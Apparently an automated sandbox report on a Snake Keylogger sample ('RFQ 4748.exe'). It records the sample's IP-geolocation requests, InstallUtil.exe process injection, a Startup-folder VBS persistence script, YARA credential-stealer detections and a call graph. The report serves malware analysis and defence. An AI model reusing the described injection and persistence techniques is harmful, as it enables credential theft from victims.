                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5026fffd50b76-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1419&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1962059&cwnd=251&unsent_bytes=0&cid=640c7d3e63995c23&ts=147&x=0"
                                                            2024-11-08 10:51:44 UTC146INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
                                                            2024-11-08 10:51:44 UTC213INData Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.549814188.114.96.34433652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:45 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:45 UTC1221INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:45 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15820
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCH5huZt5WH8S7DKbsMOlzX09H5qkDojwwyZD%2BoZhGjnfPAppHDv0kz%2BE%2Fh1MxJGj6bo%2FHhbTp5id7C2JHjLiYP5fes4MEANetDG97mqkFz3KFupVzV9DujIZn%2B84AzhZNCQWVJl"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df50279fdc0e546-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1272&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2083453&cwnd=251&unsent_bytes=0&cid=095c384381b09629&ts=145&x=0"
                                                            2024-11-08 10:51:45 UTC148INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                                            2024-11-08 10:51:45 UTC211INData Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.549826188.114.96.34433652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:47 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:47 UTC1221INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:47 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15822
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=THTcv7rKWk1YI9%2BNPZVCA0tQ%2FpohrMInrE64G15BQZ6zJYTgDwREaYWJOHi%2Bp9%2BJ0HXG8zu0v6xSRgctQaaktoc6G91NOUU%2Bp8LkXw3MHxKbHOlngFDazue47quFSAon5naPvced"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df502876c1c3aac-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1216&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2385502&cwnd=245&unsent_bytes=0&cid=2efd81741b7e909b&ts=153&x=0"
                                                            2024-11-08 10:51:47 UTC148INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                                            2024-11-08 10:51:47 UTC211INData Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.549842188.114.96.34433652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:50 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:50 UTC1219INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:50 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15825
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSkuStCtjH%2FpUf5Fks39Q4hWQrmuPKQ1N3ChToSPOiVDDbnsdySvcUvX91I2G%2BBZrOH0lE6WoVHgyA0E1updG8F%2BnRQflLta70Lwi2SvyoqPYEqPEBgPohaIZ9H8Am%2FDPS2KgWyI"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5029749e2462a-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1716&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2470989&cwnd=251&unsent_bytes=0&cid=ddaad42acda11760&ts=142&x=0"
                                                            2024-11-08 10:51:50 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                            2024-11-08 10:51:50 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:05:51:08
                                                            Start date:08/11/2024
                                                            Path:C:\Users\user\Desktop\RFQ 4748.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\RFQ 4748.exe"
                                                            Imagebase:0xa40000
                                                            File size:97'280 bytes
                                                            MD5 hash:AD61C5C16181FE8CE8FE58AB4BF3D15D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2105383235.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2089151863.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:05:51:15
                                                            Start date:08/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0x8c0000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4492614618.0000000000419000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4496477218.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4492614618.0000000000408000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4496477218.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:4
                                                            Start time:05:51:27
                                                            Start date:08/11/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs"
                                                            Imagebase:0x7ff69dd00000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:05:51:28
                                                            Start date:08/11/2024
                                                            Path:C:\Users\user\AppData\Roaming\Fallback.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\Fallback.exe"
                                                            Imagebase:0xe40000
                                                            File size:97'280 bytes
                                                            MD5 hash:AD61C5C16181FE8CE8FE58AB4BF3D15D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2303227720.000000000440D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2303227720.000000000440D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 32%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:05:51:34
                                                            Start date:08/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0x6c0000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4496144498.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4496144498.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:12%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:11%
                                                              Total number of Nodes:419
                                                              Total number of Limit Nodes:33
                                                              execution_graph 60624 6ad372c 60625 6ad3753 60624->60625 60628 6ad4911 60625->60628 60626 6ad3039 60629 6ad491e 60628->60629 60630 6ad4889 60628->60630 60633 6aaf07a 60629->60633 60630->60626 60631 6ad497a 60631->60626 60634 6aaf09d 60633->60634 60638 6aaf2e0 60634->60638 60643 6aaf2d0 60634->60643 60635 6aaf0c0 60635->60631 60639 6aaf307 60638->60639 60640 6aaf38e 60639->60640 60648 6ad0480 60639->60648 60652 6ad0490 60639->60652 60640->60635 60645 6aaf2e0 60643->60645 60644 6aaf38e 60644->60635 60645->60644 60646 6ad0480 NtProtectVirtualMemory 60645->60646 60647 6ad0490 NtProtectVirtualMemory 60645->60647 60646->60645 60647->60645 60649 6ad0490 60648->60649 60656 6ad0746 60649->60656 60653 6ad04a5 60652->60653 60655 6ad0746 NtProtectVirtualMemory 60653->60655 60654 6ad04c3 60654->60639 60655->60654 60657 6ad0755 60656->60657 60661 6ad1a80 60657->60661 60667 6ad1a90 60657->60667 60658 6ad063c 60662 6ad1a8f 60661->60662 60664 6ad1a3a 60661->60664 60672 6ad1e49 60662->60672 60677 6ad2202 60662->60677 60664->60658 60668 6ad1aa5 60667->60668 60670 6ad1e49 NtProtectVirtualMemory 60668->60670 60671 6ad2202 NtProtectVirtualMemory 60668->60671 60669 6ad1ac0 60669->60658 60670->60669 60671->60669 60673 6ad1e58 60672->60673 60683 6ad7851 60673->60683 60687 6ad7860 60673->60687 60678 6ad2211 60677->60678 60705 6ad4d08 60678->60705 60710 6ad4cc1 60678->60710 60716 6ad4d18 60678->60716 60679 6ad1c00 60684 6ad7875 60683->60684 60691 6ad7ddd 60684->60691 60688 6ad7875 60687->60688 60690 6ad7ddd NtProtectVirtualMemory 60688->60690 60689 6ad1c00 60690->60689 60692 6ad7de3 60691->60692 60696 6ad8018 60692->60696 60700 6ad7f86 60692->60700 60693 6ad7e00 60697 6ad802a 60696->60697 60699 6ad81ab NtProtectVirtualMemory 60697->60699 60698 6ad803d 60698->60693 60699->60698 60702 6ad7f40 60700->60702 60701 6ad803d 60701->60693 60702->60700 60703 6ad7937 60702->60703 60704 6ad81ab NtProtectVirtualMemory 60702->60704 60703->60693 60704->60701 60706 6ad4d0c 60705->60706 60721 6ad5160 60706->60721 60725 6ad5133 60706->60725 60707 6ad4d42 60707->60679 60711 6ad4d0c 60710->60711 60713 6ad4cca 60710->60713 60714 6ad5160 NtProtectVirtualMemory 60711->60714 60715 6ad5133 NtProtectVirtualMemory 60711->60715 60712 6ad4d42 60712->60679 60713->60679 60714->60712 60715->60712 60717 6ad4d2f 60716->60717 60719 6ad5160 NtProtectVirtualMemory 60717->60719 60720 6ad5133 NtProtectVirtualMemory 60717->60720 60718 6ad4d42 60718->60679 60719->60718 60720->60718 60722 6ad5183 60721->60722 60729 6ad5d18 60722->60729 60723 6ad5209 60723->60707 60726 6ad513d 60725->60726 60728 6ad5d18 NtProtectVirtualMemory 60726->60728 60727 6ad5209 60727->60707 60728->60727 60730 6ad5d29 60729->60730 60732 6ad5e68 NtProtectVirtualMemory 60730->60732 60733 6ad5e58 NtProtectVirtualMemory 60730->60733 60731 6ad5d58 60731->60723 60732->60731 60733->60731 60975 6c577b4 60976 6c577ba 60975->60976 60980 6aae2cf 60976->60980 60990 6aae2d0 60976->60990 60977 6c56ca2 60981 6aae2d0 60980->60981 61000 6aae718 60981->61000 61007 6aae645 60981->61007 61014 6aae6f5 60981->61014 61021 6aae6e5 60981->61021 61028 6aae695 60981->61028 61035 6aae130 60981->61035 61042 6aae1f8 60981->61042 60982 6aae2fb 60982->60977 60991 6aae2e5 60990->60991 60993 6aae718 3 API calls 60991->60993 60994 6aae1f8 3 API calls 60991->60994 60995 6aae130 3 API calls 60991->60995 60996 6aae695 3 API calls 60991->60996 60997 6aae6e5 3 API calls 60991->60997 60998 6aae6f5 3 API calls 60991->60998 60999 6aae645 3 API calls 60991->60999 60992 6aae2fb 60992->60977 60993->60992 60994->60992 60995->60992 60996->60992 60997->60992 60998->60992 60999->60992 61001 6aae742 61000->61001 61002 6aae7a4 61001->61002 61003 6aae96f 61001->61003 61006 6aaf07a NtProtectVirtualMemory 61001->61006 61002->60982 61003->61002 61004 6ad9dfa VirtualProtect 61003->61004 61005 6ad9e00 VirtualProtect 61003->61005 61004->61003 